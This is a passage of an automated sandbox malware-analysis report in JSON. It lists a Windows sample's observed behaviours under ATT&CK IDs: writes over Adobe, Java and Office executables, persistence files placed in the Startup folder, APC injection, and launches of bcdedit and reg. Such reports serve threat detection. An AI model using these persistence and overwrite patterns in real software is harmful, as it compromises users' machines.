\"C:\\Windows\\system32\\IMM32.DLL\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" trying to access non-existent file \"C:\\Windows\\SYSTEM32\\MSCOREE.DLL.local\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" trying to access non-existent file \"C:\\9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe.config\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\fusion.localgac\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" trying to access non-existent file \"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Nominatus_T7fc20cc6#\\\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" trying to access non-existent file \"C:\\9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.INI\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" trying to access non-existent file \"C:\\9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe.Local\\\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" trying to access non-existent file \"C:\\Program Files\\Common Files\\VMware\\\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" trying to access non-existent file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\VMware\\\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-appmodel-runtime-l1-1-2.dll\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-appmodel-runtime-l1-1-0.dll\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\VCRUNTIME140_CLR0400.dll\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ucrtbase_clr0400.dll\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-quirks-l1-1-0.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" reads file \"c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll.aux\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.windows.forms\\c9a4cbc00f690a9e3cddfc400f6e85bb\\system.windows.forms.ni.dll.aux\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\0b2f69b43a576b9edcc807a30872bd91\\system.ni.dll.aux\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\2c3c912ea8f058f9d04c4650128feb3f\\system.ni.dll.aux\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.drawing\\f7568d7f1b9d356f64779b4c0927cfb3\\system.drawing.ni.dll.aux\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" reads file \"c:\\9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.configuration\\96f7edb07b12303f0ec2595c7f3778c7\\system.configuration.ni.dll.aux\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\31fae3290fad30c31c98651462d22724\\system.core.ni.dll.aux\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.xml\\15af16d373cf0528cb74fc73d365fdbf\\system.xml.ni.dll.aux\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched file \"C:\\Windows\\System32\\drivers\\etc\\hosts\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched file \"C:\\Windows\\System32\\drivers\\etc\\lmhosts.sam\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched file \"C:\\Windows\\System32\\drivers\\etc\\networks\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched file \"C:\\Windows\\System32\\drivers\\etc\\protocol\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched file \"C:\\Windows\\System32\\drivers\\etc\\services\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Antivirus.bat\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Antivirus2.vbs\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Antivirus3.vbs\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\KasperskyScanner.hta\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\YourMomIsGay.html\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\YourMom.vbs\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\MSDOS32.mp3\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\MSDOS323.mp3\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched file \"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched file \"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Antivirus.bat\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-113", "type": 6, "relevance": 5, "name": "Touches files in program files directory", "description": "\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched file \"C:\\Program Files\\Common Files\\Adobe\\ARM\\1.0\\AdobeARM.exe\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched file \"C:\\Program Files\\Common Files\\Adobe\\ARM\\1.0\\AdobeARMHelper.exe\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched file \"C:\\Program Files\\Common Files\\Adobe\\ARM\\1.0\\armsvc.exe\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched file \"C:\\Program Files\\Common Files\\Adobe AIR\\Versions\\1.0\\Adobe AIR Application Installer.exe\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched file \"C:\\Program Files\\Common Files\\Adobe AIR\\Versions\\1.0\\Resources\\Adobe AIR Updater.exe\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched file \"C:\\Program Files\\Common Files\\Adobe AIR\\Versions\\1.0\\Resources\\airappinstaller.exe\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched file \"C:\\Program Files\\Common Files\\Adobe AIR\\Versions\\1.0\\Resources\\template.exe\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched file \"C:\\Program Files\\Common Files\\Java\\Java Update\\jaureg.exe\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched file \"C:\\Program Files\\Common Files\\Java\\Java Update\\jucheck.exe\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched file \"C:\\Program Files\\Common Files\\Java\\Java Update\\jusched.exe\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched file \"C:\\Program Files\\Common Files\\microsoft shared\\DW\\DW20.EXE\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched file \"C:\\Program Files\\Common Files\\microsoft shared\\DW\\DWTRIG20.EXE\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched file \"C:\\Program Files\\Common Files\\microsoft shared\\EQUATION\\EQNEDT32.EXE\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched file \"C:\\Program Files\\Common Files\\microsoft shared\\ink\\ConvertInkStore.exe\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched file \"C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickLearningWizard.exe\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched file \"C:\\Program Files\\Common Files\\microsoft shared\\ink\\InkWatson.exe\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched file \"C:\\Program Files\\Common Files\\microsoft shared\\ink\\InputPersonalization.exe\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched file \"C:\\Program Files\\Common Files\\microsoft shared\\ink\\mip.exe\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched file \"C:\\Program Files\\Common Files\\microsoft shared\\ink\\pipanel.exe\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched file \"C:\\Program Files\\Common Files\\microsoft shared\\ink\\ShapeCollector.exe\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched file \"C:\\Program Files\\Common Files\\microsoft shared\\ink\\TabTip.exe\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched file \"C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\msinfo32.exe\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched file \"C:\\Program Files\\Common Files\\microsoft shared\\OFFICE14\\FLTLDR.EXE\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched file \"C:\\Program Files\\Common Files\\microsoft shared\\OFFICE14\\LICLUA.EXE\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched file \"C:\\Program Files\\Common Files\\microsoft shared\\OFFICE14\\MSOICONS.EXE\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" connecting to \"\\ThemeApiPort\"\n \"rundll32.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" writes file \"c:\\program files\\common files\\adobe\\arm\\1.0\\adobearm.exe\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" writes file \"c:\\program files\\common files\\adobe\\arm\\1.0\\adobearmhelper.exe\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" writes file \"c:\\program files\\common files\\adobe\\arm\\1.0\\armsvc.exe\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" writes file \"c:\\program files\\common files\\adobe air\\versions\\1.0\\adobe air application installer.exe\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" writes file \"c:\\program files\\common files\\adobe air\\versions\\1.0\\resources\\adobe air updater.exe\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" writes file \"c:\\program files\\common files\\adobe air\\versions\\1.0\\resources\\airappinstaller.exe\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" writes file \"c:\\program files\\common files\\adobe air\\versions\\1.0\\resources\\template.exe\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" writes file \"c:\\program files\\common files\\java\\java update\\jaureg.exe\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" writes file \"c:\\program files\\common files\\java\\java update\\jucheck.exe\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" writes file \"c:\\program files\\common files\\java\\java update\\jusched.exe\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" writes file \"c:\\program files\\common files\\microsoft shared\\dw\\dw20.exe\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" writes file \"c:\\program files\\common files\\microsoft shared\\dw\\dwtrig20.exe\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" writes file \"c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" writes file \"c:\\program files\\common files\\microsoft shared\\office14\\fltldr.exe\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" writes file \"c:\\program files\\common files\\microsoft shared\\office14\\liclua.exe\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" writes file \"c:\\program files\\common files\\microsoft shared\\office14\\msoicons.exe\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" writes file \"c:\\program files\\common files\\microsoft shared\\office14\\msoxmled.exe\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" writes file \"c:\\program files\\common files\\microsoft shared\\office14\\oarpmany.exe\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" writes file \"c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\odeploy.exe\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" writes file \"c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\ospprearm.exe\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" writes file \"c:\\program files\\common files\\microsoft shared\\smart tag\\smarttaginstall.exe\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" writes file \"c:\\program files\\common files\\microsoft shared\\source engine\\ose.exe\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" writes file \"c:\\program files\\common files\\microsoft shared\\textconv\\wksconv\\wkconv.exe\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" writes file \"c:\\program files\\common files\\microsoft shared\\vsta\\8.0\\x86\\vsta_ep32.exe\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" writes file \"c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-85", "type": 6, "relevance": 3, "name": "Queues an Asynchronous Procedure Call (APC) in a remote process (injection)", "description": "\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"NtQueueApcThread\" (UID: 00000000-00005808)", "origin": "API Call", "attck_id": "T1055.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/004"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-2", "type": 6, "relevance": 8, "name": "Creates new processes", "description": "\"cmd.exe\" is creating a new process (Name: \"C:\\Windows\\system32\\bcdedit.exe\")\n \"cmd.exe\" is creating a new process (Name: \"C:\\Windows\\system32\\cmd.exe\")\n \"cmd.exe\" is creating a new process (Name: \"C:\\Windows\\system32\\reg.exe\")\n \"cmd.exe\" is creating a new process (Name: \"C:\\Windows\\system32\\rundll32.exe\")", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SETUP\"; Key: \"\"; Value: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\"; Key: \"\"; Value: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\"; Key: \"\"; Value: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC3-D863-11E7-B9FF-806E6F6E6963}\\\"; Key: \"\"; Value: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC4-D863-11E7-B9FF-806E6F6E6963}\\\"; Key: \"\"; Value: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\DELEGATEFOLDERS\"; Key: \"\"; Value: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\"; Key: \"\"; Value: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\"; Key: \"\"; Value: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\"; Key: \"\"; Value: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\"; Key: \"\"; Value: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{11016101-E366-4D22-BC06-4ADA335C892B}\"; Key: \"\"; Value: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\"; Key: \"\"; Value: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\"; Key: \"\"; Value: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\DELEGATEFOLDERS\"; Key: \"\"; Value: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\"; Key: \"\"; Value: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"OPEN\"; Path: 